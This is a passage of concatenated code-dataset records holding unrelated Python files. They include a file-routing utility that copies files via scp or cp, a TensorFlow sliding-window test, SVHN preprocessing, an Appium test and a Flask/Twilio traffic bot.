return listing_manifest, json_file\n\n\ndef parse_router(router, dirs, files):\n\n router_status = []\n router_re = []\n for filter, exact in zip(router['filter'], cycle(router['exact'])):\n if exact:\n router_re.append(r'\\b{}\\b'.format(filter))\n else:\n router_re.append(r'{}'.format(filter))\n\n # first search directories\n for jsons in dirs:\n js_data = []\n for js in jsons:\n with open(js, 'r') as j:\n js_data.append(json.load(j))\n dir_status = []\n for filter, key, lowercase, invert in zip(router_re,\n cycle(router['key']),\n cycle(router['lowercase']),\n cycle(router['invert'])):\n if lowercase:\n hits = [re.search(filter, j[key], re.IGNORECASE) is not None for j in js_data]\n else:\n hits = [re.search(filter, j[key]) is not None for j in js_data]\n\n if invert:\n dir_status.append(not any(hits))\n else:\n dir_status.append(any(hits))\n\n try:\n router_status.append(dir_status.index(True))\n except ValueError:\n router_status.append(None)\n\n # then search files\n for js in files:\n\n with open(js, 'r') as j:\n js_data = json.load(j)\n\n if js_data is None:\n continue\n\n file_status = []\n for filter, key, lowercase, invert in zip(router_re,\n cycle(router['key']),\n cycle(router['lowercase']),\n cycle(router['invert'])):\n\n if lowercase:\n hit = re.search(filter, js_data[key], re.IGNORECASE)\n else:\n hit = re.search(filter, js_data[key])\n\n if invert:\n hit = not hit\n\n file_status.append(hit)\n try:\n router_status.append(file_status.index(True))\n except ValueError:\n router_status.append(None)\n\n return router_status\n\n\ndef proc_loop(listing, base_dict, dry_run, delete, remote_options):\n \"\"\"Main processing loop\n\n \"\"\"\n proc_count = 0\n for proc in listing:\n\n use_dict = base_dict\n\n logging.info('Processing ' + proc)\n sz = os.path.getsize(proc)\n\n # loop through manifest, make sure the files are not growing...\n\n listing_manifest, json_file = get_listing_manifest(proc=proc)\n\n # changed from <= 1 to < 1 to account for metadata.json getting orphaned...\n if len(listing_manifest) < 1:\n logging.info(\n 'Manifest empty, continuing...(maybe files still copying?)')\n continue\n\n logging.info('Getting file sizes for manifest')\n 
listing_sz = {f: os.path.getsize(f) for f in listing_manifest}\n time.sleep(30)\n listing_manifest, json_file = get_listing_manifest(proc=proc)\n logging.info('Checking file sizes again')\n listing_sz2 = {f: os.path.getsize(f) for f in listing_manifest}\n\n if listing_sz != listing_sz2:\n logging.info(\n 'A file size changed or a new file was added, continuing...')\n continue\n\n missing_files = False\n\n if base_dict['required_files'] is not None and len(base_dict['required_files']) > 0:\n basenames = [os.path.basename(_) for _ in listing_manifest]\n for required_file in base_dict['required_files']:\n if required_file not in basenames:\n logging.info('Could not find ' + required_file)\n missing_files = True\n\n if missing_files:\n logging.info('File missing, continuing...')\n continue\n\n logging.info('Found json file ' + json_file)\n\n with open(json_file) as open_file:\n dict_json = json.load(open_file)\n\n if 'destination' in dict_json:\n use_dict['path']['re']['root'] = dict_json['destination']\n\n # if it's a directory the manifest is the contents of the directory, if it's not the manifest\n # simply matches filenames\n\n logging.info('Manifest [' + ','.join(listing_manifest) + ']')\n generators = []\n\n for m, d in zip(use_dict['map'], use_dict['default']):\n use_dict['path']['re'][m] = d\n\n for k, v in zip(use_dict['keys'], cycle(use_dict['map'])):\n generators = find_key(k, dict_json)\n use_dict['path']['re'][v] = next(\n generators, use_dict['path']['re'][v])\n\n # sub folder is a special key to copy over the appropriate sub-folder\n\n if os.path.isdir(proc):\n use_dict['path']['re']['sub_folder'] = os.path.basename(\n os.path.normpath(proc)) + '/'\n else:\n use_dict['path']['re']['sub_folder'] = ''\n\n # build a path\n new_path = build_path(\n use_dict['path']['re'], use_dict['path']['path_string'])\n # check for command triggers\n\n logging.info('Sending manifest to ' + new_path)\n\n # aiight dawg, one trigger per manifest?\n\n for f in listing_manifest:\n if remote_options['copy_protocol'] == 'scp':\n # dir check\n local_copy = False\n dir_cmd = \"ssh %s@%s 'mkdir -p \\\"%s\\\"'\" % (\n remote_options['user'], remote_options['host'], new_path)\n cp_cmd = \"scp \\\"%s\\\" %s@%s:'\\\"%s\\\"'\" % (\n f, remote_options['user'], remote_options['host'], new_path)\n elif remote_options['copy_protocol'] == 'nocopy':\n local_copy = False\n dir_cmd = ''\n cp_cmd = ''\n elif remote_options['copy_protocol'] == 'rsync':\n local_copy = False\n raise NotImplementedError\n elif remote_options['copy_protocol'] == 'cp':\n local_copy = True\n dir_cmd = \"mkdir -p \\\"%s\\\"\" % (new_path)\n cp_cmd = \"cp \\\"%s\\\" \\\"%s\\\"\" % (f, new_path)\n else:\n raise NotImplementedError\n\n logging.info('Chk command: ' + dir_cmd)\n logging.info('Copy command: ' + cp_cmd)\n\n if not dry_run:\n status = os.system(dir_cmd)\n\n if status == 0:\n logging.info(\n 'Directory creation/check succesful, copying...')\n status = os.system(cp_cmd)\n\n if local_copy:\n # check md5\n logging.info('Checking file integrity...')\n with open(f, 'rb') as f_check:\n md5_original = md5_checksum(f_check)\n new_file = os.path.join(new_path, os.path.basename(f))\n with open(new_file, 'rb') as f_check:\n md5_copy = md5_checksum(f_check)\n md5checksum = md5_original == md5_copy\n logging.info('MD5checksum: ' + str(md5checksum))\n status = status & (not md5checksum)\n\n if status == 0 and delete:\n logging.info('Copy succeeded, deleting file')\n proc_count += 1\n os.remove(os.path.join(new_path, f))\n elif status == 0:\n 
logging.info('Copy SUCCESS, continuing')\n proc_count += 1\n else:\n logging.info('Copy FAILED, continuing')\n continue\n elif dry_run and delete:\n logging.info('Would delete: ' + os.path.join(new_path, f))\n\n issue_options = {\n 'user': '',\n 'host': '',\n 'cmd_host': '',\n 'path': ''\n }\n\n for ext, cmd in zip(use_dict['command']['exts'], cycle(use_dict['command']['run'])):\n triggers = [f for f in listing_manifest if f.endswith(ext)]\n if triggers and not dry_run and not delete:\n raise NameError(\n \"Delete option must be turned on, otherwise triggers will repeat\")\n elif triggers and remote_options['copy_protocol'] == 'nocopy':\n logging.info('nocopy, doing nothing')\n elif triggers and not dry_run:\n issue_options['path'] = os.path.join(\n new_path, os.path.basename(triggers[0]))\n issue_options = merge_dicts(issue_options, remote_options)\n issue_cmd = build_path(issue_options, cmd)\n logging.info('Issuing command ' + issue_cmd)\n status = os.system(issue_cmd)\n if status == 0:\n logging.info('Command SUCCESS')\n else:\n logging.info('Command FAIL')\n elif triggers:\n issue_options['path'] = os.path.join(\n new_path, os.path.basename(triggers[0]))\n issue_options = merge_dicts(issue_options, remote_options)\n issue_cmd = build_path(issue_options, cmd)\n logging.info('Would issue command ' + issue_cmd)\n\n return proc_count\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":16092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"157014827","text":"from .Vector3D import Vector3D\n\nclass Calibrator:\n def __init__(self, total_samples=200):\n self.accel_offset = Vector3D(0, 0, 0)\n self.gyro_offset = Vector3D(0, 0, 0)\n\n self.reference_accel = Vector3D(1, 0, 0)\n self.reference_gyro = Vector3D(0, 0, 0)\n\n self.total_samples = 200\n self.completed_samples = 0\n self.is_finished = False\n\n def filter_data(self, data):\n for d in data:\n read_time, accel, gyro = d\n if self.is_finished:\n # yield (read_time, accel, gyro-self.gyro_offset)\n yield (read_time, accel-self.accel_offset, gyro-self.gyro_offset)\n else:\n self.on_data(d)\n\n def on_data(self, data):\n _, accel, gyro, = data\n self.accel_offset += accel\n self.gyro_offset += gyro\n self.completed_samples += 1\n\n if self.completed_samples >= self.total_samples:\n self.accel_offset /= self.completed_samples\n self.gyro_offset /= self.completed_samples\n\n # calibrated = raw - error\n # error = raw - calibrated \n # calibrated = true reference\n self.accel_offset -= self.reference_accel\n self.gyro_offset -= self.reference_gyro\n\n self.is_finished = True\n","sub_path":"client/src/Calibrator.py","file_name":"Calibrator.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"358545830","text":"# Copyright 2018 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for the experimental input pipeline ops.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.contrib.data.python.ops import sliding\nfrom tensorflow.python.data.ops import dataset_ops\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.framework import sparse_tensor\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import test\n\n\nclass SlideDatasetTest(test.TestCase):\n\n def testSlideDataset(self):\n \"\"\"Test an dataset that maps a TF function across its input elements.\"\"\"\n components = (np.arange(7),\n np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],\n np.array(37.0) * np.arange(7))\n\n count = array_ops.placeholder(dtypes.int64, shape=[])\n window_size = array_ops.placeholder(dtypes.int64, shape=[])\n stride = array_ops.placeholder(dtypes.int64, shape=[])\n\n def _map_fn(x, y, z):\n return math_ops.square(x), math_ops.square(y), math_ops.square(z)\n\n # The pipeline is TensorSliceDataset -> MapDataset(square_3) ->\n # RepeatDataset(count) -> _SlideDataset(window_size, stride).\n iterator = (dataset_ops.Dataset.from_tensor_slices(components)\n .map(_map_fn)\n .repeat(count)\n .apply(sliding.sliding_window_batch(window_size, stride))\n .make_initializable_iterator())\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n self.assertEqual([[None] + list(c.shape[1:]) for c in components],\n [t.shape.as_list() for t in get_next])\n\n with self.test_session() as sess:\n # stride < window_size.\n # Slide over a finite input, where the window_size divides the\n # total number of elements.\n sess.run(init_op, feed_dict={count: 20, window_size: 14, stride: 7})\n # Same formula with convolution layer.\n num_batches = (20 * 7 - 14) // 7 + 1\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(14):\n self.assertAllEqual(component[(i*7 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n # Slide over a finite input, where the window_size does not\n # divide the total number of elements.\n sess.run(init_op, feed_dict={count: 20, window_size: 17, stride: 9})\n num_batches = (20 * 7 - 17) // 9 + 1\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(17):\n self.assertAllEqual(component[(i*9 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # stride == window_size.\n sess.run(init_op, feed_dict={count: 20, window_size: 14, stride: 14})\n num_batches = 20 * 7 // 14\n for i in 
range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(14):\n self.assertAllEqual(component[(i*14 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # stride > window_size.\n sess.run(init_op, feed_dict={count: 20, window_size: 10, stride: 14})\n num_batches = 20 * 7 // 14\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(10):\n self.assertAllEqual(component[(i*14 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n # Drop the last batch which is smaller than window_size.\n sess.run(init_op, feed_dict={count: 20, window_size: 14, stride: 19})\n num_batches = (20 * 7 - 7) // 19 # = 19 * 7 // 19\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(14):\n self.assertAllEqual(component[(i*19 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # Slide over a finite input, which is less than window_size,\n # should fail straight away.\n sess.run(init_op, feed_dict={count: 1, window_size: 10, stride: 4})\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n sess.run(init_op, feed_dict={count: 1, window_size: 10, stride: 8})\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # Slide over an empty input should fail straight away.\n sess.run(init_op, feed_dict={count: 0, window_size: 8, stride: 4})\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # Empty window_size should be an initialization time error.\n with self.assertRaises(errors.InvalidArgumentError):\n sess.run(init_op, feed_dict={count: 14, window_size: 0, stride: 0})\n\n # Invalid stride should be an initialization time error.\n with self.assertRaises(errors.InvalidArgumentError):\n sess.run(init_op, feed_dict={count: 14, window_size: 3, stride: 0})\n\n def assertSparseValuesEqual(self, a, b):\n self.assertAllEqual(a.indices, b.indices)\n self.assertAllEqual(a.values, b.values)\n self.assertAllEqual(a.dense_shape, b.dense_shape)\n\n def testSlideSparse(self):\n\n def _sparse(i):\n return sparse_tensor.SparseTensorValue(\n indices=[[0]], values=(i * [1]), dense_shape=[1])\n\n iterator = dataset_ops.Dataset.range(10).map(_sparse).apply(\n sliding.sliding_window_batch(5, 3)).make_initializable_iterator()\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(init_op)\n num_batches = (10 - 5) // 3 + 1\n for i in range(num_batches):\n actual = sess.run(get_next)\n expected = sparse_tensor.SparseTensorValue(\n indices=[[0, 0], [1, 0], [2, 0], [3, 0], [4, 0]],\n values=[i * 3, i * 3 + 1, i * 3 + 2, i * 3 + 3, i * 3 + 4],\n dense_shape=[5, 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n def testSlideSparseWithDifferentDenseShapes(self):\n\n def _sparse(i):\n return sparse_tensor.SparseTensorValue(\n indices=array_ops.expand_dims(\n math_ops.range(i, dtype=dtypes.int64), 1),\n values=array_ops.fill([math_ops.to_int32(i)], i),\n dense_shape=[i])\n\n iterator = dataset_ops.Dataset.range(10).map(_sparse).apply(\n sliding.sliding_window_batch(5, 
3)).make_initializable_iterator()\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(init_op)\n num_batches = (10 - 5) // 3 + 1\n for i in range(num_batches):\n actual = sess.run(get_next)\n expected_indices = []\n expected_values = []\n for j in range(5):\n for k in range(i * 3 + j):\n expected_indices.append([j, k])\n expected_values.append(i * 3 + j)\n expected = sparse_tensor.SparseTensorValue(\n indices=expected_indices,\n values=expected_values,\n dense_shape=[5, i * 3 + 5 - 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n def testNestedSlideSparse(self):\n\n def _sparse(i):\n return sparse_tensor.SparseTensorValue(\n indices=[[0]], values=(i * [1]), dense_shape=[1])\n\n iterator = (dataset_ops.Dataset.range(10)\n .map(_sparse)\n .apply(sliding.sliding_window_batch(4, 2))\n .apply(sliding.sliding_window_batch(3, 1))\n .make_initializable_iterator())\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(init_op)\n # Slide: 1st batch.\n actual = sess.run(get_next)\n expected = sparse_tensor.SparseTensorValue(\n indices=[[0, 0, 0], [0, 1, 0], [0, 2, 0], [0, 3, 0],\n [1, 0, 0], [1, 1, 0], [1, 2, 0], [1, 3, 0],\n [2, 0, 0], [2, 1, 0], [2, 2, 0], [2, 3, 0]],\n values=[0, 1, 2, 3, 2, 3, 4, 5, 4, 5, 6, 7],\n dense_shape=[3, 4, 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n # Slide: 2nd batch.\n actual = sess.run(get_next)\n expected = sparse_tensor.SparseTensorValue(\n indices=[[0, 0, 0], [0, 1, 0], [0, 2, 0], [0, 3, 0],\n [1, 0, 0], [1, 1, 0], [1, 2, 0], [1, 3, 0],\n [2, 0, 0], [2, 1, 0], [2, 2, 0], [2, 3, 0]],\n values=[2, 3, 4, 5, 4, 5, 6, 7, 6, 7, 8, 9],\n dense_shape=[3, 4, 1])\n self.assertTrue(sparse_tensor.is_sparse(actual))\n self.assertSparseValuesEqual(actual, expected)\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n def testSlideShapeError(self):\n\n def generator():\n yield [1.0, 2.0, 3.0]\n yield [4.0, 5.0, 6.0]\n yield [7.0, 8.0, 9.0, 10.0]\n\n iterator = (dataset_ops.Dataset.from_generator(generator, dtypes.float32,\n output_shapes=[None])\n .apply(sliding.sliding_window_batch(3, 1))\n .make_initializable_iterator())\n next_element = iterator.get_next()\n\n with self.test_session() as sess:\n sess.run(iterator.initializer)\n with self.assertRaisesRegexp(\n errors.InvalidArgumentError,\n r\"Cannot batch tensors with different shapes in component 0. 
\"\n r\"First element had shape \\[3\\] and element 2 had shape \\[4\\].\"):\n sess.run(next_element)\n\n\nif __name__ == \"__main__\":\n test.main()\n","sub_path":"tensorflow/tensorflow/contrib/data/python/kernel_tests/slide_dataset_op_test.py","file_name":"slide_dataset_op_test.py","file_ext":"py","file_size_in_byte":11153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"239037742","text":"#-*-coding:utf-8-*=\nfrom appium import webdriver\nimport unittest, time\nimport ConfigParser\nimport sys\nsys.path.append('\\public')\nfrom public import *\n\n'''\npass\nOwner: Bailu\n测试用例:Vip 申请\n测试步骤:\n'''\n\nclass Vip(unittest.TestCase):\n\n def setUp(self):\n config = ConfigParser.ConfigParser()\n config.readfp(open('info.ini'))\n self.ios = config.get('ios',\"type\")\n self.driver = ios.remotedriver(unicode(self.ios))\n self.usr = config.get('vip',\"usr\")\n self.pwd = config.get('vip',\"pwd\")\n self.nick = config.get('vip',\"nick\")\n \n def test_vip_reject(self):\n login.login(self,self.usr,self.pwd)\n self.driver.quit()\n self.driver = ios.remotedriver(unicode(self.ios))\n self.driver.implicitly_wait(30)\n setting = vip.request(self)\n self.driver.quit()\n #action: 拒绝 'reject'\n #search type: 等待处理 'wait' \n result = vip.process_request(self,self.nick,'reject','wait')\n self.driver = ios.remotedriver(unicode(self.ios))\n flag = vip.verify(self)\n self.assertEqual(setting,result)\n self.assertFalse(flag)\n \n def tearDown(self):\n self.driver.quit()\n\nif __name__==\"__main__\":\n unittest.main()","sub_path":"testcase/Case_Vip_1_request.py","file_name":"Case_Vip_1_request.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"71274063","text":"class Solution:\n# def reconstructQueue(people):\n# people.sort(key=lambda p:(p[1], p[0]))\n# recon_queue = []\n# for p in people:\n# if p[1] == 0:\n# recon_queue.append(p)\n# else:\n# index = 0\n# c = 0\n# recon_queue.append(p)\n# for r in recon_queue:\n# if c == p[1]:\n# if p[1] == recon_queue[index][1]:\n# index += 1\n# else:\n# if index == len(recon_queue) - 1:\n# break\n# else: \n# recon_queue.remove(p)\n# recon_queue.insert(index, p)\n# break\n# else:\n# index += 1\n# if r[0] >= p[0]:\n# c += 1\n# return recon_queue\n\n def reconstructQueue(people):\n people.sort(key=lambda p: (-p[0], p[1]))\n print(people)\n queue = []\n for p in people:\n queue.insert(p[1], p)\n return queue\n\ndef main():\n orig_queue1 = [[4,2], [2,3], [7,0], [6,1], [7,2], [9,0], [1,4], [8,0], [6,5], [5,6]]\n orig_queue2 = [[7,0],[4,4],[7,1],[5,0],[6,1],[5,2]] \n orig_queue3 = [[3,0], [6,0], [9,0], [6,2], [13,0], [10,1], [10,2], [11,1], [12,1], [12,2]]\n recon_queue = Solution.reconstructQueue(orig_queue1)\n print(recon_queue)\n\nmain()\n\n","sub_path":"Queue Reconstruction by Height.py","file_name":"Queue Reconstruction by Height.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"467848817","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\n\nimport numpy as np\nimport h5py\n\nfrom pathlib import Path\nfrom scipy import io\nfrom tensorflow import keras\nfrom PIL import Image\n\nfrom utils import to_one_hot\n\n\ndef load_mnist():\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n\n def to_x(a):\n x = np.array([np.array(Image.fromarray(i).resize((32, 32))) for i in a])\n return x.reshape(x.shape + 
(1,))\n\n def to_y(a):\n return to_one_hot(a, 10)\n\n x_train, y_train = to_x(x_train), to_y(y_train)\n x_test, y_test = to_x(x_test), to_y(y_test)\n print('Loaded and processed mnist dataset')\n return x_train, y_train, x_test, y_test\n\n\ndef load_single_digit_data(dir='data/svhn', extra=False, greyscale=True):\n\n def to_x(a):\n a = np.array([a[:,:,:,i] for i in range(a.shape[3])])\n if greyscale:\n return np.mean(a, axis=-1, keepdims=True).astype(np.uint8)\n return a\n\n def to_y(a):\n y = np.copy(a)\n y = y.reshape(y.shape[0])\n y[y == 10] = 0\n return to_one_hot(y, 10)\n\n def load_file(file):\n cache_file = Path(dir) / f\"{file}.cache.npz\"\n if cache_file.exists():\n f = np.load(cache_file)\n print(f'Loaded cached arrays for {file}')\n return [v for k, v in f.items()]\n\n f = io.loadmat(Path(dir) / file)\n x, y = to_x(f['X']), to_y(f['y'])\n np.savez(Path(dir) / f\"{file}.cache.npz\", x, y)\n print(f'Loaded and processed {file}')\n return x, y\n\n x_train, y_train = load_file('train_32x32.mat')\n x_test, y_test = load_file('test_32x32.mat')\n\n x_extra, y_extra = None, None\n if extra:\n x_extra, y_extra = load_file('extra_32x32.mat')\n\n return (\n x_train, y_train,\n x_test, y_test,\n x_extra, y_extra\n )\n\n\ndef load_multiple_digits_data(dir='data/svhn', train=True, extra=False):\n\n def parse_digit_struct(file):\n if Path(f\"{file}.cache.json\").exists():\n with open(f\"{file}.cache.json\", \"r\") as f:\n images = json.load(f)\n print(f'Loaded cached image attrs from {file}.cache.json')\n return images\n\n f = h5py.File(file, 'r')\n print(f'Opened file {file}')\n\n names = f['digitStruct']['name']\n bbox = f['digitStruct']['bbox']\n\n def extract_name(i):\n return ''.join([chr(c[0]) for c in f[names[i][0]].value])\n\n def extract_attr(i, attr):\n attr = f[bbox[i].item()][attr]\n if len(attr) > 1:\n return [f[attr.value[j].item()].value[0][0] for j in range(len(attr))]\n else:\n return [attr.value[0][0]]\n\n images = {}\n print(f'Extracting image attrs from {file}: ', end='')\n for i in range(len(names)):\n name = extract_name(i)\n images[name] = {\n \"label\": extract_attr(i, 'label'),\n \"top\": extract_attr(i, 'top'),\n \"left\": extract_attr(i, 'left'),\n \"height\": extract_attr(i, 'height'),\n \"width\": extract_attr(i, 'width')\n }\n if i % 1000 == 0:\n print('.', end='', flush=True)\n print()\n\n with open(f\"{file}.cache.json\", 'w+') as f:\n json.dump(images, f)\n return images\n\n def process_images(dir):\n cache_file = Path(dir) / 'cache.npz'\n if cache_file.exists():\n f = np.load(cache_file)\n print(f'Loaded cached arrays for {dir}')\n return [v for k, v in f.items()]\n\n attrs = parse_digit_struct(Path(dir) / 'digitStruct.mat')\n\n x, y = [], []\n print(f'Processing images from {dir}: ', end='', flush=True)\n for i, name in enumerate(os.listdir(dir)):\n if name not in attrs:\n print('s', end='', flush=True)\n continue\n\n img = Image.open(Path(dir) / name)\n\n height = int(max(attrs[name]['height']))\n width = int(max(attrs[name]['width']))\n left = max(int(min(attrs[name]['left'])) - 0.5 * width, 0)\n top = max(int(min(attrs[name]['top'])) - 0.5 * height, 0)\n right = min(int(max(attrs[name]['left'])) + 1.5 * width, img.size[0])\n bottom = min(int(max(attrs[name]['top'])) + 1.5 * height, img.size[1])\n\n img = img.crop(box=(left, top, right, bottom))\n img = img.resize((96, 96))\n\n label = [d % 10 for d in attrs[name]['label']]\n if len(label) > 6:\n print('e', end='', flush=True)\n continue\n\n label += [10] * (6 - len(label))\n label = 
to_one_hot(np.array(label, dtype=np.int), 11)\n\n            x.append(np.array(img))\n            y.append(np.array(label))\n\n            if i % 1000 == 0:\n                print('.', end='', flush=True)\n        print()\n\n        x = np.array(x, dtype=np.uint8)\n        y = np.array(y, dtype=np.uint8)\n        np.savez(Path(dir) / \"cache.npz\", x, y)\n        return x, y\n\n    x_test, y_test = process_images(Path(dir) / 'test/')\n\n    x_train, y_train = None, None\n    if train:\n        x_train, y_train = process_images(Path(dir) / 'train/')\n\n    x_extra, y_extra = None, None\n    if extra:\n        x_extra, y_extra = process_images(Path(dir) / 'extra/')\n\n    return (\n        x_train, y_train,\n        x_test, y_test,\n        x_extra, y_extra\n    )\n\n\nif __name__ == '__main__':\n    load_multiple_digits_data()\n","sub_path":"2/svhn_preprocess.py","file_name":"svhn_preprocess.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"371834898","text":"from app import app\nfrom flask import render_template, request\nfrom twilio.twiml.messaging_response import MessagingResponse\nimport folium\nimport requests\n\n\ndef get_traffic_data(lat, lon):\n    params = {'point': f'{lat},{lon}', 'unit': 'mph', 'thickness': 14, 'key': app.config['TOMTOM_API_KEY']}\n    base_url = 'https://api.tomtom.com/traffic/services/4/flowSegmentData/absolute/10/json'\n    data = requests.get(base_url, params=params).json()\n    return data\n\n\ndef create_reply(lat, lon):\n    data = get_traffic_data(lat, lon)\n\n    road_types = {'FRC0': 'Motorway',\n                  'FRC1': 'Major road',\n                  'FRC2': 'Other major road',\n                  'FRC3': 'Secondary road',\n                  'FRC4': 'Local connecting road',\n                  'FRC5': 'Local road of high importance',\n                  'FRC6': 'Local road'\n                  }\n\n    if data['flowSegmentData']['roadClosure']:\n        reply = 'Unfortunately this road is closed!'\n\n    else:\n        reply = (f\"Your nearest road is classified as a _{road_types[data['flowSegmentData']['frc']]}_. \"\n                 f\"The current average speed is *{data['flowSegmentData']['currentSpeed']} mph* and \"\n                 f\"would take *{data['flowSegmentData']['currentTravelTime']} seconds* to pass this section of road. \"\n                 f\"With no traffic, the speed would be *{data['flowSegmentData']['freeFlowSpeed']} mph* and would \"\n                 f\"take *{data['flowSegmentData']['freeFlowTravelTime']} seconds*.\")\n\n    return reply\n\n\n@app.route('/map')\ndef create_map():\n    lat = request.args.get('lat')\n    lon = request.args.get('lon')\n\n    data = get_traffic_data(lat, lon)\n\n    points = [(i['latitude'], i['longitude']) for i in data['flowSegmentData']['coordinates']['coordinate']]\n\n    m = folium.Map(location=(lat, lon), zoom_start=15)\n    folium.PolyLine(points, color='green', weight=10).add_to(m)\n\n    return m._repr_html_()\n\n\n@app.route('/bot', methods=['POST'])\ndef bot():\n    resp = MessagingResponse()\n    msg = resp.message()\n\n    if 'Latitude' in request.values.keys() and 'Longitude' in request.values.keys():\n        lat = request.values.get('Latitude')\n        lon = request.values.get('Longitude')\n\n        reply = create_reply(lat, lon)\n        url = f'{request.url_root}map?lat={lat}&lon={lon}'\n        msg.body(f'{reply}\\n\\nCheck out the interactive map here:\\n{url}')\n\n    else:\n        msg.body('Hello! This is the Twilio Traffic Bot. Please share your location to get a live traffic report.')\n\n    return str(resp)\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n    return render_template('home.html', title='Home')\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"370443957","text":"from numpy import *\nfrom numpy.linalg import *\nm=array(eval(input(\"Matriz: \")))\nl=shape(m)[0]\nz=zeros(l, dtype=int)\nfor i in range(l):\n\tfor j in range(7):\n\t\tz[i]=z[i]+m[i,j]\nprint(z)\n\n","sub_path":"5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4059/codes/1846_1275.py","file_name":"1846_1275.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"54865576","text":"'''\nanalyse house info module\n'''\n\nimport csv\nimport sys\nimport queue\nimport os\nimport concurrent.futures\nimport time\nfrom bs4 import BeautifulSoup\nfrom super_thread import thread_pool\n\nclass Analyse(thread_pool.Task):\n    '''\n    analyse house informations from the website.\n    '''\n    \n    def __init__(self,config,log):\n        thread_pool.Task.__init__(self,'analyse_task')\n        self.log=log\n        self.house_file_name=[]\n        self.house_detail_info_queue=queue.Queue()\n        self.config=config\n        self.exe_path=self.config.get('file','exe_path')\n        self.root_file_dir=self.config.get('dir','root_file_dir')\n        self.houe_file_root=self.root_file_dir+self.config.get('dir','house_file_dir')\n        self.house_files={} #{regin:[house1,house2]}\n        self.house_files_queue=queue.Queue()\n        self.house_file_page_queue=queue.Queue()\n\n        self.house_info_queue=queue.Queue()\n\n        self.house_detail_info_list=[]\n\n        self.house_detail_dict={}\n\n        self.file_level=0\n        self.stop=False\n    \n    def run(self):\n        while not self.stop :\n            start=time.time()\n            retry=self.retry\n            self.clear()\n            self.log.info('get_house_file start......')\n\n            #self.analyse.get_house_file()\n            self.load_house_file()\n            self.log.info('get_house_file finished.....')\n            self.log.info('construct_house_infos start......')\n\n            self.construct_house_infos()\n            self.log.info('construct_house_infos finished......')\n            self.log.info('extract_house_detail start......')\n\n            self.extract_house_detail()\n            self.log.info('extract_house_detail finished......')\n            self.log.info('reduce start......')\n\n            self.reduce()\n            self.log.info('reduce finished......')\n            self.log.info('ReportForm start......')\n\n\n            end=time.time()\n            total_time=end-start\n            self.log.info(total_time)\n            time.sleep(self.request_time_interval)\n\n    def clear(self):\n        